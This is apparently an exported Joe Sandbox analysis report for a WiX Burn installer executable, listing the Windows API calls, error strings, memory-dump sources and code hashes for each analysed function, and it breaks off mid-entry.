• API ID: AddressProc$ErrorLast$LibraryLoad
• String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$Failed to load Crypt32.dll$Failed to load a decryption method$Failed to load an encryption method$SystemFunction040$SystemFunction041$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\cryputil.cpp
• API String ID: 1969025732-1098473289
• Opcode ID: 97f6f7af0809badfd44ed34861363f89320a7a1212632f73e30d3a33465e5f5c
• Instruction ID: 3a072f627e31f1ff9c812f3913af7430aae39e784ff76bf5544362242103e3cf
• Opcode Fuzzy Hash: 97f6f7af0809badfd44ed34861363f89320a7a1212632f73e30d3a33465e5f5c
• Instruction Fuzzy Hash: AA31E632A81721BBD73257109E19B0729515721B95F964277FD08BA2E1F3EC4802CBAD

Control-flow Graph
(graph image omitted; covers basic blocks 439a90-439d73)

APIs
• CoInitializeEx.OLE32(00000000,00000000), ref: 00439AB5
• CoUninitialize.OLE32 ref: 00439D5D
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: InitializeUninitialize
• String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$d:\a\wix\wix\src\burn\engine\cabextract.cpp
• API String ID: 3442037557-213801148
• Opcode ID: 8c895ae16fd3c145c1bce160baf36d13095f82af4bd0cf57aafd73db0e68bf9f
• Instruction ID: 30aa8276e6983df3f93f4df2df746a396f6a717bbebe5203e379e180d8e9f310
• Opcode Fuzzy Hash: 8c895ae16fd3c145c1bce160baf36d13095f82af4bd0cf57aafd73db0e68bf9f
• Instruction Fuzzy Hash: 1E617B36E44325BBE73056148C82F6F66989708720F21627BBD05BB3D0D2ED9C0197DE

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 788 41030a-41033a 789 41033c-41035a CreateFileW 788->789 790 4103af-4103cd GetCurrentProcess * 2 DuplicateHandle 788->790 791 410360-41036a GetLastError 789->791 792 410409-41040c 789->792 790->792 793 4103cf-4103d9 GetLastError 790->793 794 410377 791->794 795 41036c-410375 791->795 796 410416-410418 792->796 797 41040e-410414 792->797 798 4103e6 793->798 799 4103db-4103e4 793->799 800 410379 794->800 801 41037e-410393 call 40129e 794->801 795->794 802 41041a-410428 SetFilePointerEx 796->802 797->802 803 4103e8 798->803 804 4103ed-410407 call 40129e 798->804 799->798 800->801 816 410398-4103aa call 4012a1 801->816 807 41046b-410471 802->807 808 41042a-410434 GetLastError 802->808 803->804 804->816 813 4104a1-4104a7 807->813 814 410473-410477 call 43a11b 807->814 811 410441 808->811 812 410436-41043f 808->812 817 410443 811->817 818 410448-410469 call 40129e 811->818 812->811 819 41047c-410480 814->819 816->813 817->818 825 410499-41049e call 4012a1 818->825 819->813 822 410482-410494 819->822 822->825 825->813
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,0041054B,0040955C,?,?,0040959C), ref: 0041034F
                                                                                                                                                          • GetLastError.KERNEL32(?,0041054B,0040955C,?,?,0040959C,0040959C,00000000,?,00000000), ref: 00410360
                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,0041054B,0040955C,?,?,0040959C,0040959C,00000000,?), ref: 004103B4
                                                                                                                                                          • GetCurrentProcess.KERNEL32(000000FF,00000000,?,0041054B,0040955C,?,?,0040959C,0040959C,00000000,?,00000000), ref: 004103BE
                                                                                                                                                          • DuplicateHandle.KERNELBASE(00000000,?,0041054B,0040955C,?,?,0040959C,0040959C,00000000,?,00000000), ref: 004103C5
                                                                                                                                                          • GetLastError.KERNEL32(?,0041054B,0040955C,?,?,0040959C,0040959C,00000000,?,00000000), ref: 004103CF
                                                                                                                                                          • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0041054B,0040955C,?,?,0040959C,0040959C,00000000,?,00000000), ref: 00410420
                                                                                                                                                          • GetLastError.KERNEL32(?,0041054B,0040955C,?,?,0040959C,0040959C,00000000,?,00000000), ref: 0041042A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                                                                                                          • String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$crypt32.dll$d:\a\wix\wix\src\burn\engine\container.cpp$feclient.dll

Control-flow Graph
• Function 0x466096-0x4662d5 (graph rendering not reproduced here; nodes were marked Executed / Not Executed)
APIs
• EnterCriticalSection.KERNEL32(004B2588,00000000,00000000,00000001,0000000C,0000000C,?,00419D2F,00000000,00000001,00481EB0,?,00000000,00000000,0000000C,00000000), ref: 004660AB
• LeaveCriticalSection.KERNEL32(004B2588,?,00419D2F,00000000,00000001,00481EB0,?,00000000,00000000,0000000C,00000000,00000001,00000000,00000000,00000000,00000008), ref: 004662AD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: Failed to combine the log path.$Failed to copy log path.$Failed to create log based on current system time.$Failed to ensure log file directory exists: %ls$Failed to expand the log path.$Failed to get log directory.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\logutil.cpp$failed to create log file: %ls

Control-flow Graph
• Function 0x43a11b-0x43a275 (graph rendering not reproduced here; nodes were marked Executed / Not Executed)
APIs
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,?,00000000,?,?,0041047C,?,00000000,?,0041054B), ref: 0043A159
• GetLastError.KERNEL32(?,0041047C,?,00000000,?,0041054B,0040955C,?,?,0040959C,0040959C,00000000,?,00000000), ref: 0043A166
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CreateErrorEventLast
• String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$d:\a\wix\wix\src\burn\engine\cabextract.cpp$wininet.dll

Control-flow Graph
• Function 0x439110-0x43927c (graph rendering not reproduced here; nodes were marked Executed / Not Executed)
APIs
• CompareStringA.KERNEL32(00000000,00000000,<the>.cab,?,?), ref: 00439140
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 00439156
• GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 0043915F
• DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00439166
• GetLastError.KERNEL32(?,?), ref: 00439170
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 0043920F
• GetLastError.KERNEL32(?,?), ref: 0043921C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
• String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$d:\a\wix\wix\src\burn\engine\cabextract.cpp

Control-flow Graph
• Function 0x46d997-0x46dad8 (graph rendering not reproduced here; nodes were marked Executed / Not Executed)
APIs
  • Part of subcall function 004018A4: LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018C0
  • Part of subcall function 004018A4: GetLastError.KERNEL32(?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018D1
• CoTaskMemFree.OLE32(00000000,00000000,00000000,004080B0,00000000,?,?,?,0046D7F7,00000000,?,004087CC,00000000), ref: 0046DABE
• FreeLibrary.KERNEL32(00000000,00000000,00000000,004080B0,00000000,?,?,?,0046D7F7,00000000,?,004087CC), ref: 0046DACD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FreeLibrary$ErrorLastLoadTask
• String ID: Failed to backslash terminate shell folder path: %ls$Failed to copy shell folder path: %ls$Failed to find SHGetKnownFolderPath entry point.$Failed to get known folder path.$Failed to load shell32.dll.$SHGetKnownFolderPath$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\shelutil.cpp$shell32.dll

Control-flow Graph
• Function 0x419e57-0x419ef3 (graph rendering not reproduced here; nodes were marked Executed / Not Executed)
APIs
  • Part of subcall function 00466096: EnterCriticalSection.KERNEL32(004B2588,00000000,00000000,00000001,0000000C,0000000C,?,00419D2F,00000000,00000001,00481EB0,?,00000000,00000000,0000000C,00000000), ref: 004660AB
  • Part of subcall function 00466096: LeaveCriticalSection.KERNEL32(004B2588,?,00419D2F,00000000,00000001,00481EB0,?,00000000,00000000,0000000C,00000000,00000001,00000000,00000000,00000000,00000008), ref: 004662AD
• OpenEventLogW.ADVAPI32(00000000,Application), ref: 00419E7D
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 00419E89
• ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,00481D44,00000000), ref: 00419EE4
• CloseEventLog.ADVAPI32(00000000), ref: 00419EEB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
                                                                                                                                                          • String ID: Application$Failed to open Application event log$Setup$_Failed$d:\a\wix\wix\src\burn\engine\logging.cpp$log
                                                                                                                                                          • API String ID: 1844635321-3478071590
                                                                                                                                                          • Opcode ID: b24dd954bf40572fa6c77ff353cd82409e86e247637cf574ef66685bd4210c88
                                                                                                                                                          • Instruction ID: 25602d8d37ff3994c3581dbc36eede86ea2f9b62e1512641e70d333f68b1b7db
                                                                                                                                                          • Opcode Fuzzy Hash: b24dd954bf40572fa6c77ff353cd82409e86e247637cf574ef66685bd4210c88
                                                                                                                                                          • Instruction Fuzzy Hash: 5801B132A802613AA32162265C49FBF186CDBC2F65B51012BFE04F61D1D64C4C4282FD
                                                                                                                                                          APIs
                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 0046B54B
                                                                                                                                                          • CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,004B2770,?,00000000,0040941E,?,?,?,?,?,?), ref: 0046B59A
                                                                                                                                                          • CLSIDFromProgID.OLE32(MSXML.DOMDocument,004B2770,?,?,?,?,?,?), ref: 0046B5AA
                                                                                                                                                          Strings
                                                                                                                                                          • failed to get CLSID for XML DOM, xrefs: 0046B5B6
                                                                                                                                                          • p'K, xrefs: 0046B58F
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0046B56B
                                                                                                                                                          • Msxml2.DOMDocument, xrefs: 0046B595
                                                                                                                                                          • MSXML.DOMDocument, xrefs: 0046B5A5
                                                                                                                                                          • failed to initialize COM, xrefs: 0046B55F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FromProg$Initialize
                                                                                                                                                          • String ID: MSXML.DOMDocument$Msxml2.DOMDocument$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed to get CLSID for XML DOM$failed to initialize COM$p'K
                                                                                                                                                          • API String ID: 4047641309-1891771615
                                                                                                                                                          • Opcode ID: 070bdd681c39948e8ba65f255dbd5541c684a9910f97b0bf3af22f934e23c017
                                                                                                                                                          • Instruction ID: d5e8f0636564a9fbbd5183b2aa3e290f30986c28cd0e782d391055c3d4ed0cf7
                                                                                                                                                          • Opcode Fuzzy Hash: 070bdd681c39948e8ba65f255dbd5541c684a9910f97b0bf3af22f934e23c017
                                                                                                                                                          • Instruction Fuzzy Hash: B101A735B813307BD32216565C0AB932A84DB61BA5F25052BFD4AFA2D0FBDC48C185DE
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004016CA: WaitForMultipleObjects.KERNEL32(?,?,000000FF,00000000,00000000,?,?,00439EE2,00000002,000000FF,00000000,000000FF,?,?,00000000), ref: 004016DE
                                                                                                                                                          • GetExitCodeThread.KERNELBASE(004777D8,?,00000002,000000FF,00000000,000000FF,?,?,00000000), ref: 00439F24
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00439F32
                                                                                                                                                          • ResetEvent.KERNEL32(004777B0,00000002,000000FF,00000000,000000FF,?,?,00000000), ref: 00439F6F
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00439F79
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                                                                                                                          • String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$d:\a\wix\wix\src\burn\engine\cabextract.cpp
                                                                                                                                                          • API String ID: 2979751695-1452834964
                                                                                                                                                          • Opcode ID: e874f0e8548b149026500272a360ad1abc8949ffd6ad981d57e0178fdc3723b7
                                                                                                                                                          • Instruction ID: 9c59b011f51dc673cda1be7f211cc67538aff543692fbbd8764081582b806fa8
                                                                                                                                                          • Opcode Fuzzy Hash: e874f0e8548b149026500272a360ad1abc8949ffd6ad981d57e0178fdc3723b7
                                                                                                                                                          • Instruction Fuzzy Hash: BD314771A04215BBDB10DF658D05FAFBAECAB44710F1041BBF509F6290E6B8DD019B58
                                                                                                                                                          APIs
                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00408804,00000000,00000000,?,?,?,?,0040930B,?,?,00000000,?,?,00000003,00000000,004080B0), ref: 004082B3
                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00408798,?,?,?,0040930B,?,?,00000000,?,?,00000003,00000000,004080B0,00000000), ref: 004082C0
                                                                                                                                                          • InitializeCriticalSection.KERNEL32(004081A4,?,?,?,0040930B,?,?,00000000,?,?,00000003,00000000,004080B0,00000000), ref: 004082D7
                                                                                                                                                          • GetCurrentProcess.KERNEL32(0040885C,004087E8,004087CC,?,?,?,0040930B,?,?,00000000,?,?,00000003,00000000,004080B0,00000000), ref: 004082FC
                                                                                                                                                            • Part of subcall function 0046674A: OpenProcessToken.ADVAPI32(004080B0,00000008,00000000,004087CC,004087E8,00000000,004080B0,00000000,?,?,?,?,?,?), ref: 00466768
                                                                                                                                                            • Part of subcall function 0046674A: GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00466772
                                                                                                                                                            • Part of subcall function 0046674A: CloseHandle.KERNELBASE(00000000), ref: 0046682A
                                                                                                                                                            • Part of subcall function 00423268: CompareStringW.KERNEL32(0000007F,00000001,00000002,000000FF,00486CB8,000000FF,004087CC,004087E8,004080B0,00000000,?,?), ref: 004232CC
                                                                                                                                                            • Part of subcall function 00423268: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,log,000000FF), ref: 004232EF
                                                                                                                                                            • Part of subcall function 00423268: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,xlog,000000FF), ref: 00423312
                                                                                                                                                            • Part of subcall function 00423268: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,00486EA0,000000FF), ref: 00423335
                                                                                                                                                            • Part of subcall function 00423268: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,00486EA4,000000FF), ref: 00423358
                                                                                                                                                            • Part of subcall function 00423268: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,help,000000FF), ref: 0042337B
                                                                                                                                                          Strings
                                                                                                                                                          • Fatal error while parsing command line., xrefs: 00408328
                                                                                                                                                          • Failed to initialize engine section., xrefs: 00408351
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\engine.cpp, xrefs: 00408390
                                                                                                                                                          • Failed to initialize internal cache functionality., xrefs: 0040837E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString$CriticalInitializeSection$Process$CloseCurrentErrorHandleLastOpenToken
                                                                                                                                                          • String ID: Failed to initialize engine section.$Failed to initialize internal cache functionality.$Fatal error while parsing command line.$d:\a\wix\wix\src\burn\engine\engine.cpp
                                                                                                                                                          • API String ID: 268551788-802451582
                                                                                                                                                          • Opcode ID: b70d1163e0850b519a33fec7cc106fcf5c68e651c9aad3c5785423cded4f40ff
                                                                                                                                                          • Instruction ID: 371c593e34d63dd5b413f7c6df2c014ff19fca8bb5ac72b95103c9ce247f2655
                                                                                                                                                          • Opcode Fuzzy Hash: b70d1163e0850b519a33fec7cc106fcf5c68e651c9aad3c5785423cded4f40ff
                                                                                                                                                          • Instruction Fuzzy Hash: 6D318472944215BBCB11DFA4CC85FDA3B6CEB04710F54417AFE0DEB185EA78A6448BB4
                                                                                                                                                          APIs
                                                                                                                                                          • OpenProcessToken.ADVAPI32(004080B0,00000008,00000000,004087CC,004087E8,00000000,004080B0,00000000,?,?,?,?,?,?), ref: 00466768
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00466772
                                                                                                                                                           • GetTokenInformation.KERNELBASE(?,00000014(TokenElevation),00000004,00000004,?,?,?,?,?,?,?), ref: 004667BB
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 004667D4
                                                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 0046682A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                                                                                                                          • String ID: Failed to get elevation token from process.$Failed to open process token.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\procutil.cpp
                                                                                                                                                          • API String ID: 4040495316-1361431665
                                                                                                                                                          • Opcode ID: 22247918d0beedd1c79e0552544f23a93f3711712c8440a749aa487ebdb1e7d4
                                                                                                                                                          • Instruction ID: 9d703d655154a1856f3ff9ce90b9f696ef254a014e140dab863fb6466555baf5
                                                                                                                                                          • Opcode Fuzzy Hash: 22247918d0beedd1c79e0552544f23a93f3711712c8440a749aa487ebdb1e7d4
                                                                                                                                                          • Instruction Fuzzy Hash: E421E936E41224B7D7219B558C05B9FBA68EF10725F12406BFE08BB2D0E6788D00D6D9
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,00000000,00000001,00000000), ref: 004058B7
                                                                                                                                                          • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,?,00000000,00000001,00000000), ref: 00405902
                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 00405946
                                                                                                                                                          • GetLastError.KERNEL32(?,00478AEC,?,00000000,?,00000000,00000000,00000000), ref: 004059A4
                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 004059F6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$Global$AllocFree
                                                                                                                                                          • String ID: d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp$failed to allocate version info for file: %ls$failed to get version info for file: %ls$failed to get version value for file: %ls
                                                                                                                                                          • API String ID: 1145190524-2366914229
                                                                                                                                                          • Opcode ID: 6befc36a0f6a07c1b4dccf583a37e8e22728198433d23f7540b5f6345e3c3fb3
                                                                                                                                                          • Instruction ID: 4cf5761365e7817005ee946c716856097d040c14643abe45a0da6aa0e1a9449b
                                                                                                                                                          • Opcode Fuzzy Hash: 6befc36a0f6a07c1b4dccf583a37e8e22728198433d23f7540b5f6345e3c3fb3
                                                                                                                                                          • Instruction Fuzzy Hash: 15413B72A40325B7E321A6558C05FAF7A68DF05774F11817BFE08B72C1DB788C008AE9
                                                                                                                                                          APIs
                                                                                                                                                          • CreateDirectoryW.KERNELBASE(00000000,0040951C,?,00000000,?,0041DD2E,00000000,00000000,?,version.dll,00000000,0040951C,00000000,0040960C,?,00000001), ref: 0040242A
                                                                                                                                                          • GetLastError.KERNEL32(?,0041DD2E,00000000,00000000,?,version.dll,00000000,0040951C,00000000,0040960C,?,00000001), ref: 00402438
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                          • String ID: cannot find parent path$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dirutil.cpp$failed to create path: %ls
                                                                                                                                                          • API String ID: 1375471231-281134482
                                                                                                                                                          • Opcode ID: 678f7e05db71df02d347992ae81a9d48ecdf6d4daa0fa0d390600d566aaad62c
                                                                                                                                                          • Instruction ID: 6752c2e759bdc844ee7f90c3fec559d13cbdb074147013c08ddcab0a41e473f8
